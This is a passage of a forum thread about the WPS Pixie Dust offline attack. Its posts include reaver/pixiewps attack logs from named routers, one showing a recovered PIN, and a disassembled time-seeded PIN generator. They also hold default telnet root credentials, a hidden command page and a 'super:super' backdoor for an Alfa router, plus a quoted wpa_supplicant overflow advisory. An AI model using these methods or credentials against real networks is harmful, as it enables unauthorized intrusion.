Page 7 of 12 FirstFirst 123456789101112 LastLast
Results 301 to 350 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #301
    Join Date
    2015-Mar
    Posts
    127
    Sounds good. Great work everybody involved.

    Got my first belkin today. first pin generated was the correct one.

  2. #302
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    With pixie dust or the pin generator? Model number?

  3. #303
    Join Date
    2015-Mar
    Posts
    127
    with the -W1 option.

  4. #304
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by soxrok2212 View Post
    It is not a problem with reaver, it is just how the AP is configured. You will see the same thing in Wireshark if you look.
    Hi,soxrok... I see APPs on wireshark.. And there is problem... Pixie sees wrong values..Look screenshots..

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 07:34:36:3e:4a:0e:38:df:e7:cd:fa:15:85:92:9e:71
    [P] PKE: 0d:da:3b:db:55:f3:68:cf:55:2b:98:93:18:0a:f4:77:28:58:3d:45:25:58:0a:35:f0:5c:b3:89:7e:3e:3a:f9:dc:49:0a:dd:7f:f0:bb:61:3d:20:8a:fb:d7:d7:17:d0:fa:94:ad:26:5a:8d:70:9e:a1:3c:7f:cb:69:9c:a1:a7:f7:b5:d7:bf:6b:d4:fb:7c:e4:51:fb:f9:6b:9c:ef:5b:94:6c:7d:7a:4e:40:11:49:83:3d:bb:84:2a:cc:23:f9:3c:63:7f:af:70:4b:28:33:ea:f5:f5:05:38:19:76:09:8c:6a:8b:37:9e:27:ec:63:96:c1:f4:ab:23:27:d9:57:30:3b:b9:9d:55:e9:76:5d:81:5c:07:b4:8c:90:0c:02:37:9c:2f:f7:2d:6f:5b:b2:a0:4f:ee:9a:88:a1:1f:f4:3f:bd:78:6f:d5:8a:48:6f:fe:c7:b7:c2:da:9e:68:b8:35:0e:3e:e5:f3:4d:e1:4b:5f:b0:08:c9:d4:9e:a7:93
    [P] WPS Manufacturer: AirTies Wireless Networks
    [P] WPS Model Number: 1.0.2.0
    [P] Access Point Serial Number: AT1731434014674
    [+] Received M1 message
    [P] PKR: 07:a0:3b:9f:28:60:17:1f:38:52:9e:7e:0b:5f:ef:04:62:15:b6:86:05:cb:4b:ee:f4:64:4f:a1:fd:35:da:3e:54:a6:26:c7:93:2a:b5:00:1c:e7:81:37:58:e8:ec:d1:fb:08:3a:f3:44:53:64:a1:41:02:25:ed:41:87:a5:85:aa:c6:98:87:7c:41:8f:a0:e6:96:0b:52:b3:bf:18:05:00:18:16:f0:4c:12:41:e1:bc:ca:e5:12:d0:67:2a:99:cb:04:2f:bb:21:22:9b:99:38:13:5b:ed:44:52:4e:f8:35:81:9f:98:63:f7:98:d9:6a:6f:a2:e8:3b:71:13:cd:e4:6a:b9:3e:51:d2:43:7f:a1:eb:7f:6a:74:5b:06:b2:29:55:5e:c9:27:36:a9:d7:1a:e0:3e:78:35:63:68:33:10:8c:44:64:96:86:96:03:74:d8:59:df:47:03:26:e3:5c:5b:93:18:ac:71:39:29:c5:4e:98:ef:3e:77:73:6a
    [P] AuthKey: 99:58:17:50:f0:15:e3:c8:aa:75:c0:0f:fe:47:d7:b8:e8:f7:bf:af:9d:8a:64:91:74:1c:6f:36:21:1d:72:d5
    [+] Sending M2 message
    [P] E-Hash1: 80:3f:98:56:4f:6c:f7:64:bf:e9:39:9a:d9:39:24:04:7b:b4:84:44:48:81:6a:6b:e3:ba:c5:ee:86:c5:d1:32
    [P] E-Hash2: 79:d2:d0:6a:0e:12:82:d8:ae:9f:32:aa:21:95:07:ef:45:12:78:a6:ba:60:c2:aa:24:a2:db:b2:ca:51:8b:bb
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    http://imgur.com/XslVDB6

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 6a:34:66:5e:16:2c:db:cb:5b:11:f7:cc:78:a3:a0:c9
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] PKR: 19:fc:9c:fb:93:99:c3:5b:96:d8:d1:71:92:2e:64:89:85:5e:b8:c2:51:cc:f0:3d:e5:87:ef:8a:4d:5b:fd:63:bb:4d:ac:1d:d5:fd:ec:a6:ab:f2:35:80:33:bc:c9:61:4f:f5:6b:51:ce:1c:64:dd:c8:e2:a2:aa:98:5d:b0:8c:fe:90:1f:db:fb:a1:13:ec:55:29:4f:3e:49:3a:80:62:4d:fe:77:9e:6e:78:25:5f:5d:30:8f:34:20:2a:28:82:2f:08:23:af:86:79:29:1c:be:e8:75:af:c8:a7:e9:90:52:2a:15:cd:49:21:c0:00:62:91:3e:1e:94:11:55:92:28:54:81:89:f9:af:99:b8:f4:7a:29:80:0a:92:69:18:63:97:5f:85:73:51:af:9b:63:fb:a3:dc:0e:7d:eb:2b:23:3d:8b:4f:50:e5:eb:9b:bc:7e:d6:2b:21:93:09:52:6b:8a:71:d0:33:31:6c:82:01:f3:ee:85:77:97:2c:ae
    [P] AuthKey: 2b:da:97:bc:a7:06:a8:e9:94:6e:ff:f3:70:e3:84:8d:ec:48:ad:b0:ba:49:74:6b:a0:31:93:db:ac:71:9a:09
    [+] Sending M2 message
    [P] E-Hash1: 88:a0:55:ea:db:12:db:0d:f4:61:91:5c:3f:e7:11:07:6d:5a:1f:57:b2:7e:fc:6e:34:29:3f:2a:de:56:c8:74
    [P] E-Hash2: 97:c4:d6:06:29:db:a1:bf:4c:e9:96:c2:ee:6f:dd:e6:df:b6:30:c1:20:68:e5:2e:d2:ef:d6:82:43:38:31:b6
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]
    http://imgur.com/fnrrZUn

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: da:42:7d:5e:4c:b6:a3:98:b5:f3:41:77:42:8e:a6:d8
    [P] PKE: c6:bc:d8:bc:9a:be:0e:e3:ef:06:dd:55:bc:07:79:1b:56:32:76:fd:63:b9:b1:84:a6:6a:fe:ec:98:d8:d1:ae:62:fe:23:e1:c1:93:39:81:5a:ff:69:56:32:28:12:3e:2b:de:7a:d6:79:93:0a:b2:3a:fd:35:e2:03:2b:e7:4b:08:fc:81:76:c9:46:1a:8b:96:1a:f3:bf:85:99:f8:fb:d3:b5:91:a9:96:92:ad:fd:90:17:45:a6:34:9a:01:9f:a0:df:4d:a3:d4:0e:38:bc:79:b2:9e:38:c2:7b:5e:8c:97:b9:23:89:6c:91:e1:ae:82:bf:f0:86:06:ff:11:da:30:14:dc:39:28:c6:51:07:05:a3:b0:50:93:5b:50:44:8a:5f:19:e8:a7:2c:86:22:21:b4:2a:11:40:e7:e8:53:e5:0d:7f:b1:90:a2:01:c7:7a:5e:65:2a:cc:13:7d:3b:3c:00:67:00:ee:66:40:93:7e:7d:c9:0b:d8:62:fc:37
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: P-660W-T1 v3
    [P] Access Point Serial Number: 00000001
    [+] Received M1 message
    [P] PKR: 80:d4:14:fc:c5:52:20:b5:15:b0:e4:4d:d4:ed:39:aa:aa:04:7c:b5:b4:c7:a7:68:f3:53:5a:d6:1b:40:74:66:45:88:19:ab:32:54:ff:62:c7:73:3e:f8:20:1e:39:7b:98:2e:79:2a:6f:2c:c0:f5:2c:11:af:8b:fc:ed:5b:09:03:bb:05:15:c3:b4:2a:1e:ec:8a:11:ee:ef:45:b0:8f:4d:47:5c:76:ed:8f:01:c5:4f:38:2e:58:25:54:df:af:9a:c7:9e:d4:1f:d5:ae:9b:47:87:7e:91:03:74:62:52:b7:c7:b8:30:27:a5:77:8f:42:f4:1c:d7:8c:40:71:ce:41:ae:c5:92:d4:7f:90:9b:ee:7f:f7:6f:c6:8c:74:c6:8e:aa:50:65:b4:7f:42:ce:e3:76:54:fb:cc:1d:c9:93:2a:96:15:76:4b:86:9a:18:8f:f8:17:48:4f:5c:d6:37:29:be:e1:4e:95:91:4b:21:fa:2c:2c:73:57:88:f4:0b
    [P] AuthKey: c5:d7:f1:9d:c1:ae:3a:ff:ba:91:7e:74:e3:22:ab:d2:1c:4e:fe:d8:e4:77:07:76:2a:14:92:e5:e1:67:99:c9
    [+] Sending M2 message
    [P] E-Hash1: 23:21:cc:28:94:70:12:dc:15:1b:cc:92:55:18:bf:5f:7b:8a:4e:cd:34:a8:2a:21:03:57:ef:3d:a3:4b:4f:9b
    [P] E-Hash2: c4:52:d0:f5:c8:46:cf:d4:4d:bd:f1:49:2e:ea:a2:7a:c9:47:d5:4f:5c:de:f2:67:19:74:40:a0:87:0b:e8:cf
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    [Pixie-Dust]
    http://imgur.com/1MrIW4K

    Code:
    Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 87:22:86:c8:e7:13:9b:77:7d:08:0b:74:85:2b:c0:e4
    [P] PKE: a5:e7:ee:d7:ae:0b:3c:c4:4d:d8:fe:d1:91:b1:a6:88:68:dc:08:af:e7:19:70:7e:b3:4e:56:1b:d7:06:30:6a:92:a6:c2:6a:2f:ad:1d:0b:c0:fb:73:8d:63:5c:33:8a:8d:b0:01:70:c4:e0:c5:6e:fb:33:85:ef:1a:e6:1e:7d:e2:77:70:bc:a0:9a:eb:05:d5:bc:12:ef:d7:9b:96:44:2c:8e:34:b5:57:36:e1:9f:fc:9d:c0:22:de:4d:a0:91:c4:83:d4:39:d3:fb:91:5e:0d:b1:5c:2e:bb:89:c5:d4:c8:69:ad:8a:b3:f3:57:71:ee:37:66:af:5a:a6:ec:c0:13:47:6b:2e:29:88:93:d4:0d:0e:fc:c7:a4:3f:12:53:62:e4:91:8f:60:c3:81:65:c7:9c:eb:33:47:77:7b:da:23:6f:64:e7:f5:3d:09:68:e8:a9:a1:5c:6b:7e:59:e5:06:15:c2:1a:2d:3b:f3:8e:b5:ea:f8:81:f4:74:d9:fc
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [P] Access Point Serial Number: 14CC200000*
    [+] Received M1 message
    [P] PKR: 71:ad:3b:95:65:b4:e3:1e:28:da:2a:d3:98:88:5f:23:4a:07:a1:21:37:45:87:ea:e5:47:01:0a:ba:65:be:7f:52:02:b0:82:3a:b1:f0:ed:17:8f:54:3a:35:a8:8c:65:cc:53:fe:67:23:ea:81:ac:9e:15:48:55:3f:97:bd:29:41:c9:f6:b5:7d:23:b5:3e:63:fc:68:9a:8f:91:e4:a4:ff:2e:9a:12:1c:87:a6:f9:9a:f2:b9:c0:21:a7:61:c4:39:28:1d:1a:5c:e4:66:9d:14:08:9f:2c:0a:e7:c1:f8:54:f5:a8:7e:81:5f:eb:ce:74:09:f8:1d:cb:46:fc:2e:c6:29:f3:c1:93:ba:62:ee:de:54:f4:21:40:55:e8:37:bb:27:52:e7:56:dd:02:09:57:84:4b:f8:78:ed:49:f7:89:7a:23:e3:b3:52:9e:8a:6b:2a:1b:64:b5:77:fd:0b:3e:ba:17:2f:fd:1d:a9:48:d6:39:97:68:4f:fb:28:bc
    [P] AuthKey: 10:91:7d:d9:5a:ab:2b:0b:b6:90:db:6e:52:50:ce:c5:8e:3e:6a:91:51:32:50:bc:9a:a1:70:16:29:b9:c9:d0
    [+] Sending M2 message
    [P] E-Hash1: cd:8e:34:12:12:61:ae:92:9f:ef:fd:7a:88:55:03:3f:5a:52:ad:27:7a:b4:f3:ec:08:1c:07:ab:e9:61:6d:fc
    [P] E-Hash2: 6e:a2:a5:cc:2b:94:ff:d9:9e:fd:d2:d3:5a:dd:73:c0:51:40:92:a7:85:3f:cc:ff:40:ab:bf:e1:15:7c:fa:57
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 2 s
    [Pixie-Dust]


    AND This AP VULNERABLE , pixi sees true values

    Code:
    Trying pin 12345670.
    .............................
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [+] Received M1 message
    [P] PKR: ................
    e:e4:84:ca:d7:97:fb:98:a9:a3:fb:ca:db:5e:d7:4d:04:b9:80
    [P] AuthKey: 
    [+] Sending M2 message
    [P] E-Hash1: 
    [P] E-Hash2: 
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] PSK1: 11:95:69:82:fa:31:a9:2b:2e:5d:f3:9d:02:6b:1c:f5
    [Pixie-Dust][*] PSK2: 6a:e0:0a:ed:09:16:46:66:f4:ef:88:3d:4c:ed:95:ae
    [Pixie-Dust]   [+] WPS pin: 71632285
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    http://imgur.com/zlmrfjO

    I think this is problem so Pixie not vulnerable , Realtek ,brodcom and atheros chipsets ....

    I don t know but probably
    Last edited by Saydamination; 2015-05-16 at 21:14.

  5. #305
    Join Date
    2013-Sep
    Posts
    264
    hello
    Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )
    "Pixie sees wrong values."
    pixiewps ( you have another thread to speak about it ) does not "see" any value,
    Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
    I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
    cheers

  6. #306
    Join Date
    2015-Apr
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    Try this PIN: 76757891
    IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

    How did you get this PIN ?

    I'll try it later this week, because I'm travelling right now.

    When will the new update of pixie be released ?

    Many thanks.

  7. #307
    Join Date
    2015-Mar
    Posts
    127
    When it's ready. I was told very soon. Kept checking back here. Or u could follow the github

  8. #308
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by unsuns06 View Post
    IT'S THE 3RD TIME I TRY TO POST A REPLY, I hope this ONE WILL BE PUBLISHED.

    How did you get this PIN ?

    I'll try it later this week, because I'm travelling right now.

    When will the new update of pixie be released ?

    Many thanks.
    Beta tool

  9. #309
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    Beta tool
    Will said beta tool ever be released? I wanna play too
    Or maybe even an email?

  10. #310
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by kcdtv View Post
    hello
    Hold on a second my friend : this thread is to speak about pixie dust attack "theoretically"; not for reporting bugs using modified reaver ( you have another thread for that )

    pixiewps ( you have another thread to speak about it ) does not "see" any value,
    Or you enter the value manually, or you use a script or you are using the automated reaver (that is the case )...
    I suggest you to post in the correct thread : Reaver modfication for Pixie Dust Attack
    cheers
    Thanks @kcdtv ..

    I will do it...

  11. #311
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    Will said beta tool ever be released? I wanna play too
    Or maybe even an email?
    Yeah probably this week. We're just testing to make sure it works and ironing out bugs if we find any. Kudos to Wiire!!! He's an awesome dev

  12. #312
    Join Date
    2015-Mar
    Posts
    127
    I can beta also

  13. #313
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by kcdtv View Post
    3.
    Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
    basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
    on this devices the PIN is permanent/unconfigurable [IMG]
    Help would be appreciated
    Hi,
    Got the Firmware, unpacked with fmk, checked with idapro.
    Found this function in wscd (it's the "gen-pin" function from the .sh script), but i'm not as good in mips, the (in my opinion) important parts are marked, maybe someone, who's familiarized with mips can tell something about.

    Code:
    LOAD:0040C4C4                 la      $t9, gettimeofday
    LOAD:0040C4C8                 move    $a1, $zero
    LOAD:0040C4CC                 jalr    $t9 ; gettimeofday
    LOAD:0040C4D0                 addiu   $a0, $sp, 0xF0+var_68
    LOAD:0040C4D4                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C4D8                 lw      $a0, 0xF0+var_68($sp)
    LOAD:0040C4DC                 la      $t9, srand
    LOAD:0040C4E0                 nop
    LOAD:0040C4E4                 jalr    $t9 ; srand
    LOAD:0040C4E8                 nop
    LOAD:0040C4EC                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C4F0                 nop
    LOAD:0040C4F4                 la      $t9, rand
    LOAD:0040C4F8                 nop
    LOAD:0040C4FC                 jalr    $t9 ; rand
    LOAD:0040C500                 nop
    LOAD:0040C504                 li      $v1, 0x6B5FCA6B
    LOAD:0040C50C                 mult    $v0, $v1
    LOAD:0040C510                 sra     $a0, $v0, 31
    LOAD:0040C514                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C518                 nop
    LOAD:0040C51C                 la      $t9, 0x400000
    LOAD:0040C520                 nop
    LOAD:0040C524                 addiu   $t9, (sub_404128 - 0x400000)
    LOAD:0040C528                 mfhi    $v1
    LOAD:0040C52C                 sra     $v1, 22
    LOAD:0040C530                 subu    $a1, $v1, $a0
    LOAD:0040C534                 sll     $a0, $a1, 5
    LOAD:0040C538                 subu    $a0, $a1
    LOAD:0040C53C                 sll     $v1, $a0, 6
    LOAD:0040C540                 subu    $v1, $a0
    LOAD:0040C544                 sll     $v1, 3
    LOAD:0040C548                 addu    $v1, $a1
    LOAD:0040C54C                 sll     $a0, $v1, 2
    LOAD:0040C550                 addu    $v1, $a0
    LOAD:0040C554                 sll     $v1, 7
    LOAD:0040C558                 subu    $a1, $v0, $v1
    LOAD:0040C55C                 sll     $s0, $a1, 2
    LOAD:0040C560                 move    $a0, $a1
    LOAD:0040C564                 jalr    $t9 ; sub_404128
    LOAD:0040C568                 addu    $s0, $a1
    LOAD:0040C56C                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C570                 sll     $s0, 1
    LOAD:0040C574                 addu    $a0, $s0, $v0
    LOAD:0040C578                 la      $t9, 0x400000
    LOAD:0040C57C                 nop
    LOAD:0040C580                 addiu   $t9, (sub_403F60 - 0x400000)
    LOAD:0040C584                 jalr    $t9 ; sub_403F60
    LOAD:0040C588                 addiu   $a1, $sp, 0xF0+var_D0
    LOAD:0040C58C                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C590                 addiu   $a1, $sp, 0xF0+var_D0
    LOAD:0040C594                 la      $a0, 0x440000
    LOAD:0040C598                 la      $t9, printf
    LOAD:0040C59C                 nop
    LOAD:0040C5A0                 jalr    $t9 ; printf
    LOAD:0040C5A4                 addiu   $a0, (aPinS - 0x440000)  # "PIN: %s\n"
    LOAD:0040C5A8                 lw      $gp, 0xF0+var_D8($sp)
    LOAD:0040C5AC                 li      $a0, 0xADAC
    LOAD:0040C5B0                 addu    $a0, $s2, $a0
    LOAD:0040C5B4                 la      $t9, strcpy
    LOAD:0040C5B8                 b       loc_40C8C0
    LOAD:0040C5BC                 addiu   $a1, $sp, 0xF0+var_D0

  14. #314
    Join Date
    2013-Sep
    Posts
    264
    WoW
    Thank you SO MUCH someone else ( i mean you, not someone else )
    It is much more "readable" than what i got.
    i am not used to MIPs neither (my poor skills in dissembling speak for-themselves :P )
    i wil try to with the tool you used, i am curious about LOAD:0040C8C0 / and checking sub_404128 / sub_403F60
    The very last line you underline is definitely like a simple "printf" that's "stdout" the value of the PIN

    SO GREAT!
    first, thanks to you, we know 100% sure that building time is the string used with some randomization.
    the startup.sh script was giving a strong clue : time was "generated" just before the PIN....
    Another clue : we already know that time is used as a seed for the diffie Hellman key exchange.
    Now we know : time is definitely and surely used to generate the default PIN
    And it is the first build time.

    That's kind of an issue if we look in a way to generate the exact default PIN. . depending of the randomization, but it looks like this with the devices i saw; we might be able to guess the firsts digit correctly realtioning with the year of production,,,, then the PIN respects the checksum so the seconds start on 7 digits
    One hour is 3600 seconds and we would need to have maximum about 15 minutes more or less from exact building time to get the first half of PIN... sorry for my english, but i guess you see what i mean...
    but a little pixie flying around told me that this kind of "unsuported realteck" would, maybe, who knows?, not be unsupported anymore for so long....
    thanks so much for the information and it is helping a lot.................
    Last edited by kcdtv; 2015-04-28 at 21:46.

  15. #315
    Join Date
    2015-Mar
    Posts
    141
    DOH! How did i forget about fmk, but last i used it was when i was taking part in "jailbreaking" the neotv 300b. Looks like i got some playing to do :-D

  16. #316
    Quote Originally Posted by kcdtv View Post
    1.
    The best way is simply to save a *.cap file with the PROBES and M messages and to add a *.txt file with the output of modified reaver.
    In the case that the chipset and/or the model-manufacturer doesn't appear fully/dirreclty in the probes/stdout of modified reaver, please add manualy this information

    2.
    They are not corrupted but you need to get m1-m2 and m3 and you will not get this full sequence on a locked router (until it is unlocked again).

    3.
    Do you know how to "disassemble" firmware? i am stuck and need some help, i found something very interesting on unsupported realteck in parts that can be disassembled easly with binwalk from craig heffner.
    basically there is a little *.sh script on startup that generate 4 things ( or check if theses four things have been generated correctly and generate them if that not the case) and one of them is the default WPS PIN.
    on this devices the PIN is permanent/unconfigurable
    Help would be appreciated
    Hello kcdtv,

    I have same kind of model you posted, an Alfa Network AIP-W525H (version 1) with firmware v2.5.2.a1, just to tell you that you can change this "permanent" WPS pin, not only that but change mac address. There's 2 ways to do it:
    - you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
    - you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp

    Indeed there's the wscd command that allows you to generate and assign pins with arguments like -gen-pin, generate pin code for local entitiy (it's misspelled on source code ); -peer_pin, assign pin code for peer entitiy; -local_pin, assign pin code for local device

    With wscd -gen-pin you can generate pins randomly, but there's other command tool named flash (like nvram) that stores values permanently over reboots:

    // get WPS pin
    # flash get wlan0 HW_WSC_PIN
    HW_WSC_PIN="77756886"

    // generate a "random" WPS pin
    # flash -gen-pin

    // save a new pin manually for instance 88884444 (reboot afterwards to take effect)
    # flash set wlan0 HW_WSC_PIN 88884444

    // change mac address permanently on wlan0
    # flash set wlan0 HW_WLAN_ADDR 00c0ca1c2014

    // change mac address temporarily (untill reboot) on wlan0 (to take effect do >> ifconfig wlan0 down && ifconfig wlan0 up)
    # ifconfig wlan0 hw ether 00c0ca111111

    About that pin generator -gen-pin I did find stuff over some extracted files from firmware, but I missed some stuff that I need to extract again cause it was long ago and over telnet I saw more info.

    Did you have a look at the source code over this web page http://192.168.2.1/wlwps.asp?
    There's a function genPinClicked() maybe it will help to look it up.

    Congrats everyone for your efforts
    Last edited by reversetheg@p; 2015-04-29 at 15:58. Reason: duplicated quote

  17. #317
    Join Date
    2013-Sep
    Posts
    264
    WoW && WoW
    Like someone else you are amazing too
    Thta's actualy one of the most exiting thread , full of amazing people, you guys rules!
    - you can issue commands over telnet 192.168.2.1 23 login as root and 5up as pass
    YES!
    You don't know how much I was looking for that!
    'cause I noticed telnet is enabled even-thought there is no way to enable / or disable it / or configure it (from the web interface with the proposed option)
    But I couldn't log in.
    Now i can thank you SO MUCH that's awsome
    By the way, did you noticed this permanent "super" backdoor?
    With credentials super:super you can log with administrator privileges. (but not in telnet)

    - you can issue commands over web on a hidden page http://192.168.2.1/syscmd.asp
    i get a 404 error when i try to acess this web page or if i try to execute a command through POST request (but i am not use at all to this so maybe i do something wrong)
    i also use version v3.2.0.2.6 different then your. I should make a downgade to check al this very interesting and fundamentals elements that you bring to us.
    Thanks for showing us and explaining us all this system around PIN managment (and so much more, this are tremendous informations )

  18. #318
    Join Date
    2015-Apr
    Posts
    15
    @ kcdv
    i'm glad, that i could help and i'm with you: great thread !

    And a little update :

    VULNERABLE:

    Edimax
    Fonera Fon 2.0n (FON 2303B)
    Ralink RT 3052


    Code:
    [P] E-Nonce: 72:a5:2f:83:81:21:32:85:04:2c:30:60:d8:cf:ab:9e
    [P] PKE: 6a:b2:23:7b:37:81:58:2c:f6:a1:0c:f9:a8:ec:4c:14:70:dc:0b:70:a1:cb:1e:dc:0a:22:17:2d:b0:83:c4:bc:3a:47:b7:39:a9:63:ea:57:ff:38:ba:61:6d:2f:f7:45:96:45:80:70:1d:cf:27:1f:8a:84:52:77:e0:5c:e9:c1:72:9d:e7:8a:20:70:aa:29:e3:3d:ea:01:c5:34:c9:70:64:e3:72:c7:9a:08:b5:86:61:32:a0:7d:80:b6:e1:9c:5c:57:ab:90:4b:f5:24:50:cb:3e:31:e3:6e:d0:f9:a2:67:ab:69:71:07:9d:35:fc:97:0d:25:fa:2f:a3:d2:be:ae:eb:a2:34:9e:e5:f6:92:27:80:88:0b:fc:24:ee:b3:47:e9:35:17:a1:f5:c2:72:58:44:e6:cd:49:05:4a:2a:23:26:a3:99:8d:ae:54:bd:a7:c0:7c:3a:52:28:fc:58:a6:2b:aa:dc:b5:88:4d:b9:4f:04:41:98:82:25:2a:0a
    [P] PKR: 5d:8e:b8:d7:5d:71:79:d3:c1:d5:b1:72:b4:d0:8d:85:f0:5c:13:5f:1e:8c:35:fb:83:2e:15:9a:c9:ed:0f:bf:45:48:93:77:38:2f:90:4a:4c:53:ae:4b:ee:18:4d:cc:d8:98:d8:6c:98:b2:3f:45:fe:0c:52:1b:69:75:b4:85:d0:44:1e:ca:ad:8c:57:b6:a5:13:72:5a:8b:0d:38:1a:50:21:24:71:14:7d:13:72:65:92:53:1c:de:f3:a9:03:c5:ba:65:ff:64:c8:ac:84:00:7b:c9:8b:03:61:6c:9b:39:56:4d:3a:27:a8:66:de:79:99:a2:ab:82:9c:e2:98:53:61:ba:8d:d3:9b:47:4e:d3:ff:f1:8d:e0:61:39:f6:9f:35:a2:2f:23:c4:ed:af:da:a0:77:bc:b2:db:36:21:8c:9d:14:27:96:61:22:89:37:33:09:fa:2b:1f:f0:99:9e:ea:e8:59:ad:bc:8d:d9:75:0a:db:c9:f9:43:ba:83
    [P] AuthKey: 54:76:bd:c3:63:02:b2:fe:02:dd:fb:2e:db:e5:3d:2f:0f:4e:a9:e2:bc:cb:fb:d6:58:a9:47:c8:ea:56:99:34
    [P] E-Hash1: 08:80:1e:79:8c:5f:27:fb:09:d3:35:cb:e3:59:67:c2:c6:48:4b:d3:0f:5a:cc:42:05:c9:80:e9:83:36:ea:c2
    [P] E-Hash2: 6c:b5:bb:78:81:8d:c1:41:af:c0:32:91:8a:b6:13:64:fe:39:26:b6:76:85:ad:e7:37:d9:cc:7e:d2:c1:db:41

  19. #319
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    @kcdtv pointed out a newly documented "flaw" I guess i would call it: http://w1.fi/security/2015-1/wpa_sup...d-overflow.txt
    It was something was I was actually considering a few days ago, but I guess people beat me to it :P
    Anyways, it looks like this may be a gateway into a bunch more information... potentially information dumps, router reboots, memory leaks, the list goes on and on. I personally don't know how to implement it. There is an option in mdk3 that does something similar, but it doesn't work for theses purposes... maybe it can be modified? If you run mdk3 --fullhelp I think the command is p but I don't recall.

    If you don't want to click the link, it is just a text document:
    Code:
    wpa_supplicant P2P SSID processing vulnerability
    
    Published: April 22, 2015
    Identifier: CVE-2015-1863
    Latest version available from: http://w1.fi/security/2015-1/
    
    
    Vulnerability
    
    A vulnerability was found in how wpa_supplicant uses SSID information
    parsed from management frames that create or update P2P peer entries
    (e.g., Probe Response frame or number of P2P Public Action frames). SSID
    field has valid length range of 0-32 octets. However, it is transmitted
    in an element that has a 8-bit length field and potential maximum
    payload length of 255 octets. wpa_supplicant was not sufficiently
    verifying the payload length on one of the code paths using the SSID
    received from a peer device.
    
    This can result in copying arbitrary data from an attacker to a fixed
    length buffer of 32 bytes (i.e., a possible overflow of up to 223
    bytes). The SSID buffer is within struct p2p_device that is allocated
    from heap. The overflow can override couple of variables in the struct,
    including a pointer that gets freed. In addition about 150 bytes (the
    exact length depending on architecture) can be written beyond the end of
    the heap allocation.
    
    This could result in corrupted state in heap, unexpected program
    behavior due to corrupted P2P peer device information, denial of service
